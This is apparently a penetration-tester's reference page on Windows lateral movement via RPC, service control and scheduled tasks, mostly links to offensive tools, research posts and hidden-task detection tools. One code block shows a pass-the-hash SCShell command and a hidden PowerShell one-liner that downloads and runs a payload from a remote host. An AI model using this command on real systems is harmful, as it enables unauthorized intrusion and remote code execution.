# RPC

* <https://sensepost.com/blog/2021/building-an-offensive-rpc-interface/>
* <https://github.com/s0i37/lateral>

## SCM

* <https://github.com/Mr-Un1k0d3r/SCShell>
* <https://github.com/juliourena/SharpNoPSExec>
* <https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Fileless%20Lateral%20Movement/Program.cs>

Using Python [implementation](https://github.com/Mr-Un1k0d3r/SCShell/blob/master/scshell.py) and PtH:

```
$ python scshell.py MEGACORP/snovvcrash@192.168.1.11 -hashes :fc525c9683e8fe067095ba2ddc971889 -service-name lfsvc
SCShell>C:\windows\system32\cmd.exe /c powershell.exe -nop -w hidden -c iex(new-object net.webclient).downloadstring('http://10.10.13.37:8080/payload.ps1')
```

## Task Scheduler

* <https://riccardoancarani.github.io/2021-01-25-random-notes-on-task-scheduler-lateral-movement/>
* <https://cymulate.com/blog/task-scheduler-new-vulnerabilities-for-schtasks-exe/>

### RPC

* [\[PDF\] Unorthodox Lateral Movement (Riccardo Ancarani)](https://github.com/RiccardoAncarani/talks/blob/master/F-Secure/unorthodox-lateral-movement.pdf)
* <https://github.com/Ridter/atexec-pro>

### Task Tampering

* <https://labs.withsecure.com/publications/scheduled-task-tampering>
* <https://github.com/jsecu/ModTask>

### Hidden Tasks

* <https://habr.com/ru/companies/rvision/articles/723050/>
* <https://rt-solar.ru/solar-4rays/blog/4839/>
* <https://github.com/4RAYS-by-SOLAR/taskcache-re-plugin>
* <https://github.com/BinaryDefense/HiddenTaskHunter/blob/main/hunt_hidden_tasks.ps1>

#### GhostTask

* <https://github.com/netero1010/GhostTask>
* <https://gist.github.com/Workingdaturah/991de2d176b4b8c8bafd29cc957e20c2>
* <https://github.com/dmcxblue/SharpGhostTask>

### Tools

* <https://github.com/mandiant/SharPersist>
* <https://github.com/RiccardoAncarani/TaskShell>
* <https://github.com/netero1010/ScheduleRunner>

#### go-msrpc / goexec

* <https://github.com/oiweiwei/go-msrpc>
* <https://www.falconops.com/blog/introducing-goexec>
* <https://github.com/FalconOpsLLC/goexec>

## Research / Fuzzing

* <https://www.incendium.rocks/posts/Automating-MS-RPC-Vulnerability-Research/>
* <https://github.com/warpnet/MS-RPC-Fuzzer>